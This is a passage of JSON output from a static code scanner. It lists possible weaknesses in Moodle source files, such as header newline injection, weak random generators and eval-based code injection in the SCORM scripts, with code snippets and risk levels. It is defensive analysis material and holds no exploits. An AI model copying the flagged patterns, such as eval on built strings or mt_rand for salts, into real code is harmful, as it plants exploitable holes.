72, "appercutAttackItemId": 8961, "startLineNumber": 284}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionResponse.html", "positionInStartLine": 4, "patternDescription": "If the application uses external sources for generating HTTP response headers, and the data is not filtered properly, the malicious user can introduce newline symbols into its elements. Since HTTP headers are separated using newline symbols, the malicious user can enter its own headers in the server responses.", "appercutVulnerName": "Incorrect Newline Symbol Filtration in HTTP-response Headers", "endLineNumber": 83, "positionInEndLine": 40, "startLineNumber": 83, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/admin/index.php", "code": " // Before you start reporting issues about the collision attacks against\n // SHA-1, you should understand that we are not actually attempting to do\n // any cryptography here. This is hashed purely so that the key is not\n // that apparent in the address bar itself. Anyone who catches the HTTP\n // traffic can immediately use it as a valid admin key.\n header('Location: index.php?cache=0&upgradekeyhash='.sha1($_POST['upgradekey']));\n die();\n}\n\nif ((isset($_GET['cache']) and $_GET['cache'] === '0')\n or (isset($_POST['cache']) and $_POST['cache'] === '0')\n", "vulnerId": "APPCUT:62:14554", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionResponse.html", "positionInStartLine": 4, "patternDescription": "If the application uses external sources for generating HTTP response headers, and the data is not filtered properly, the malicious user can introduce newline symbols into its elements. Since HTTP headers are separated using newline symbols, the malicious user can enter its own headers in the server responses.", "appercutVulnerName": "Incorrect Newline Symbol Filtration in HTTP-response Headers", "endLineNumber": 63, "positionInEndLine": 84, "startLineNumber": 63, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}]}, {"pageNumber": 18, "vulnerabilities": [{"sourceFileName": "moodle/lib/horde/framework/Horde/Imap/Client/Auth/DigestMD5.php", "code": " $str = fread($fd, 32);\n fclose($fd);\n } else {\n $str = '';\n for ($i = 0; $i < 32; ++$i) {\n $str .= chr(mt_rand(0, 255));\n }\n }\n\n return base64_encode($str);\n }\n", "vulnerId": "APPCUT:62:14514", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 28, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 182, "positionInEndLine": 43, "startLineNumber": 182, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/flowplayer/flowplayer-3.2.13.js", "code": " return String(l).replace(/\\s/g, \" \").replace(/\\'/g, '\"')\n }, getHTML: function (o, l) {\n o = i({}, o);\n var n = '<object width=\"' + o.width + '\" height=\"' + o.height + '\" id=\"' + o.id + '\" name=\"' + o.id + '\"';\n if (o.cachebusting) {\n o.src += ((o.src.indexOf(\"?\") != -1 ? \"&\" : \"?\") + Math.random())\n }\n if (o.w3c || !h) {\n n += ' data=\"' + o.src + '\" type=\"application/x-shockwave-flash\"'\n } else {\n n += ' classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\"'\n", "vulnerId": "APPCUT:62:14530", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 74, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 933, "positionInEndLine": 76, "startLineNumber": 933, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/type/multianswer/renderer.php", "code": " // Work out a good input field size.\n $size = max(1, core_text::strlen(trim($response)) + 1);\n foreach ($subq->answers as $ans) {\n $size = max($size, core_text::strlen(trim($ans->answer)));\n }\n $size = min(60, round($size + rand(0, $size * 0.15)));\n // The rand bit is to make guessing harder.\n\n $inputattributes = array(\n 'type' => 'text',\n 'name' => $qa->get_qt_field_name($fieldname),\n", "vulnerId": "APPCUT:62:14522", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 38, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 208, "positionInEndLine": 59, "startLineNumber": 208, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/password_compat/lib/password.php", "code": " }\n if (!$buffer_valid || PasswordCompat\\binary\\_strlen($buffer) < $raw_salt_len) {\n $bl = PasswordCompat\\binary\\_strlen($buffer);\n for ($i = 0; $i < $raw_salt_len; $i++) {\n if ($i < $bl) {\n $buffer[$i] = $buffer[$i] ^ chr(mt_rand(0, 255));\n } else {\n $buffer .= chr(mt_rand(0, 255));\n }\n }\n }\n", "vulnerId": "APPCUT:62:14497", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 60, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 132, "positionInEndLine": 75, "startLineNumber": 132, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": "function print_badge_image(badge $badge, stdClass $context, $size = 'small') {\n $fsize = ($size == 'small') ? 'f2' : 'f1';\n\n $imageurl = moodle_url::make_pluginfile_url($context->id, 'badges', 'badgeimage', $badge->id, '/', $fsize, false);\n // Appending a random parameter to image link to forse browser reload the image.\n $imageurl->param('refresh', rand(1, 10000));\n $attributes = array('src' => $imageurl, 'alt' => s($badge->name), 'class' => 'activatebadge');\n\n return html_writer::empty_tag('img', $attributes);\n}\n\n", "vulnerId": "APPCUT:62:14520", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 32, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 991, "positionInEndLine": 46, "startLineNumber": 991, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/odslib.class.php", "code": " global $CFG;\n\n require_once($CFG->libdir.'/filelib.php');\n\n do {\n $dir = 'ods/'.time().'_'.rand(0, 10000);\n } while (file_exists($CFG->tempdir.'/'.$dir));\n\n make_temp_directory($dir);\n make_temp_directory($dir.'/META-INF');\n $dir = \"$CFG->tempdir/$dir\";\n", "vulnerId": "APPCUT:62:14508", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 37, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 834, "positionInEndLine": 51, "startLineNumber": 834, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/moodlelib.php", "code": "\n while ($draws > 0) {\n $last--;\n\n $keys = array_keys($array);\n $rand = rand(0, $last);\n\n $return[$keys[$rand]] = $array[$keys[$rand]];\n unset($array[$keys[$rand]]);\n\n $draws--;\n", "vulnerId": "APPCUT:62:14525", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 16, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 8162, "positionInEndLine": 30, "startLineNumber": 8162, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/backup/cc/entities.class.php", "code": "\n $response = '';\n $source = str_split($source, 1);\n\n for ($i = 1; $i <= $length; $i++) {\n $num = mt_rand(1, count($source));\n $response .= $source[$num - 1];\n }\n }\n\n return $response;\n", "vulnerId": "APPCUT:62:14512", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 23, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 330, "positionInEndLine": 49, "startLineNumber": 330, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/mod/feedback/item/captcha/print_captcha.php", "code": " $textcol = new stdClass();\n $textcol->red = get_random_color(${'col_text'.$colnum}[0], ${'col_text'.$colnum}[1]);\n $textcol->green = get_random_color(${'col_text'.$colnum}[0], ${'col_text'.$colnum}[1]);\n $textcol->blue = get_random_color(${'col_text'.$colnum}[0], ${'col_text'.$colnum}[1]);\n $color_text = imagecolorallocate($image, $textcol->red, $textcol->green, $textcol->blue);\n $angle_text = rand(-20, 20);\n $left_text = $i * $charwidth;\n $text = $nums[$i];\n $checkchar .= $text;\n imagettftext($image, 30, $angle_text, $left_text, 35, $color_text, $fontfile, $text);\n}\n", "vulnerId": "APPCUT:62:14496", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 18, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 106, "positionInEndLine": 31, "startLineNumber": 106, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/bennu/bennu.class.php", "code": "\n static function generate_guid() {\n // Implemented as per the Network Working Group draft on UUIDs and GUIDs\n\n // These two octets get special treatment\n $time_hi_and_version = sprintf('%02x', (1 << 6) + mt_rand(0, 15)); // 0100 plus 4 random bits\n $clock_seq_hi_and_reserved = sprintf('%02x', (1 << 7) + mt_rand(0, 63)); // 10 plus 6 random bits\n\n // Need another 14 random octects\n $pool = '';\n for($i = 0; $i < 7; ++$i) {\n", "vulnerId": "APPCUT:62:14502", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 64, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 34, "positionInEndLine": 78, "startLineNumber": 34, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/question/engine/lib.php", "code": " * @copyright 2011 The Open University\n * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later\n */\nclass question_variant_random_strategy implements question_variant_selection_strategy {\n public function choose_variant($maxvariants, $seed) {\n return rand(1, $maxvariants);\n }\n}\n\n\n/**\n", "vulnerId": "APPCUT:62:14511", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 15, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 985, "positionInEndLine": 36, "startLineNumber": 985, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/auth/shibboleth/auth.php", "code": " else\n {\n $IDPArray = array();\n }\n $IDPArray = appendCookieValue($selectedIDP, $IDPArray);\n setcookie ('_saml_idp', generate_cookie_value($IDPArray), time() + (100*24*3600));\n }\n\n /**\n * Prints the option elements for the select element of the drop down list\n *\n", "vulnerId": "APPCUT:62:14532", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CommonHttpOnlyCookies.html", "positionInStartLine": 8, "patternDescription": "If the web application uses cookies that are available to browser scripts, and the application is vulnerable to Cross-Site Scripting (XSS) attacks, the malicious user could easily access the victim\u2019s cookies and use it to their own ends.", "appercutVulnerName": "HttpOnly Cookies", "endLineNumber": 354, "positionInEndLine": 89, "startLineNumber": 354, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/xhprof/xhprof_moodle.php", "code": " }\n\n // Evaluate automatic (random) profiling if necessary\n $profileauto = false;\n if (!empty($CFG->profilingautofrec)) {\n $profileauto = (mt_rand(1, $CFG->profilingautofrec) === 1);\n }\n\n // See if the $script matches any of the included patterns\n $included = empty($CFG->profilingincluded) ? '' : $CFG->profilingincluded;\n $profileincluded = profiling_string_matches($script, $included);\n", "vulnerId": "APPCUT:62:14519", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 24, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 125, "positionInEndLine": 60, "startLineNumber": 125, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/mod/feedback/item/captcha/print_captcha.php", "code": "$textcolnum = rand(1, 3);\n\n//create the numbers to print out\n$nums = array();\nfor ($i = 0; $i < $charcount; $i++) {\n $nums[] = rand(0, 9); //Ziffern von 0-\n}\n\n//to draw enough elipses so I draw 0.2 * width and 0.2 * height\n//we need th colors for that\n$properties = array();\n", "vulnerId": "APPCUT:62:14498", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 14, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 68, "positionInEndLine": 24, "startLineNumber": 68, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/course/dndupload.js", "code": " return;\n }\n this.uploaddialog = true;\n\n var timestamp = new Date().getTime();\n var uploadid = Math.round(Math.random()*100000)+'-'+timestamp;\n var content = '';\n var sel;\n if (extension in this.lastselected) {\n sel = this.lastselected[extension];\n } else {\n", "vulnerId": "APPCUT:62:14533", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/CryptoInsecureRandomness.html", "positionInStartLine": 45, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 632, "positionInEndLine": 47, "startLineNumber": 632, "patternCodeLanguage": "JavaScript", "appercutRisk": "LOW"}]}, {"pageNumber": 12, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " } else {\n var element = parent + '.' + property;\n var expression = new RegExp(CMIIndexStore,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n var elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property] || eval('typeof(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue)') != typeof(data[property])) {\n datastring += elementstring;\n }\n", "vulnerId": "APPCUT:62:14426", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1184, "positionInEndLine": 87, "startLineNumber": 1184, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n value = value + '';\n matches = value.match(expression);\n if (matches != null) {\n //Create dynamic data model element\n if (element != elementmodel) {\n", "vulnerId": "APPCUT:62:14416", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 52, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 292, "positionInEndLine": 113, "startLineNumber": 292, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " for (i = 1; i < elementIndexes.length - 1; i++) {\n elementIndex = elementIndexes[i];\n if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n", "vulnerId": "APPCUT:62:14409", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 305, "positionInEndLine": 98, "startLineNumber": 305, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if ((eval('typeof datamodel[\"' + scoid + '\"][\"' + element + '\"]')) == \"undefined\"\n && (eval('typeof datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n\n // add this specific element to the data model (by cloning\n // the generic element) so we can track changes to it\n eval('datamodel[\"' + scoid + '\"][\"' + element + '\"]=CloneObj(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]);');\n }\n\n // check if the current element exists in the datamodel\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"]')) != \"undefined\") {\n\n", "vulnerId": "APPCUT:62:14412", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 565, "positionInEndLine": 139, "startLineNumber": 565, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-datasource/yui2-datasource.js", "code": "Math.max(oFullResponse.lastIndexOf(\"]\"),oFullResponse.lastIndexOf(\"}\"));\n oFullResponse = oFullResponse.substring(0,arrayEnd+1);\n\n // Turn the string into an object literal...\n // ...eval is necessary here\n oFullResponse = eval(\"(\" + oFullResponse + \")\");\n\n }\n }\n }\n }\n", "vulnerId": "APPCUT:62:14407", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1067, "positionInEndLine": 75, "startLineNumber": 1067, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/requirejs/require.js", "code": " * loader plugins, not for plain JS modules.\n * @param {String} text the text to execute/evaluate.\n */\n req.exec = function (text) {\n /*jslint evil: true */\n return eval(text);\n };\n\n //Set up with config info.\n req(cfg);\n}(this));\n", "vulnerId": "APPCUT:62:14434", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 19, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 2142, "positionInEndLine": 25, "startLineNumber": 2142, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " errorCode = \"351\";\n diagnostic = \"Data Model Element Pattern Too Long\";\n }\n if ((errorCode == \"0\") && ((correct_responses[interactiontype].duplicate == false) ||\n (!duplicatedPA(element,parentelement,value))) || (errorCode == \"0\" && value == \"\")) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n } else {\n if (errorCode == \"0\") {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Pattern Already Exists\";\n", "vulnerId": "APPCUT:62:14420", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 67, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 604, "positionInEndLine": 97, "startLineNumber": 604, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " } else {\n errorCode = \"408\";\n }\n break;\n case 'cmi.interactions.n.correct_responses.n.pattern':\n if (typeof eval(parentelement) != \"undefined\") {\n // Use cmi.interactions.n.type value to check the right dataelement format\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n var interactiontype = eval(String(parentelement).replace('correct_responses','type'));\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n", "vulnerId": "APPCUT:62:14411", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 63, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 575, "positionInEndLine": 79, "startLineNumber": 575, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n errorCode = \"201\";\n }\n subelement = subelement.concat('.' + elementIndex + '_' + elementIndexes[i + 1]);\n", "vulnerId": "APPCUT:62:14414", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 308, "positionInEndLine": 96, "startLineNumber": 308, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " eval(element + ' = \"\";');\n }\n }\n }\n\n eval(cmiobj[scoid]);\n eval(cmiint[scoid]);\n eval(cmicommentsuser[scoid]);\n eval(cmicommentslms[scoid]);\n\n if (cmi.completion_status == '') {\n", "vulnerId": "APPCUT:62:14417", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 12, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 263, "positionInEndLine": 27, "startLineNumber": 263, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " subobject.objectives = new Object();\n subobject.objectives._count = 0;\n }\n break;\n case 'cmi.interactions.n.objectives.n.id':\n if (typeof eval(parentelement) != \"undefined\") {\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n }\n", "vulnerId": "APPCUT:62:14410", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 63, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 560, "positionInEndLine": 79, "startLineNumber": 560, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n value = value + '';\n matches = value.match(expression);\n if (matches != null) {\n //Create dynamic data model element\n", "vulnerId": "APPCUT:62:14415", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 291, "positionInEndLine": 87, "startLineNumber": 291, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " }\n } else {\n if (element == 'cmi.comments') {\n eval(element + '+=\"' + value + '\";');\n } else {\n eval(element + '=\"' + value + '\";');\n }\n errorCode = \"0\";\n return \"true\";\n }\n }\n", "vulnerId": "APPCUT:62:14418", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 357, "positionInEndLine": 75, "startLineNumber": 357, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-profiler/yui2-profiler-debug.js", "code": " * @static\n */\n registerObject : function (name /*:String*/, object /*:Object*/, recurse /*:Boolean*/) /*:Void*/{\n \n //get the object\n object = (lang.isObject(object) ? object : eval(name));\n \n //save the object\n container[name] = object;\n \n for (var prop in object) {\n", "vulnerId": "APPCUT:62:14432", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 59, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 454, "positionInEndLine": 65, "startLineNumber": 454, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " subelement = 'cmi';\n for (i = 1; i < elementIndexes.length - 1; i++) {\n elementIndex = elementIndexes[i];\n if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' 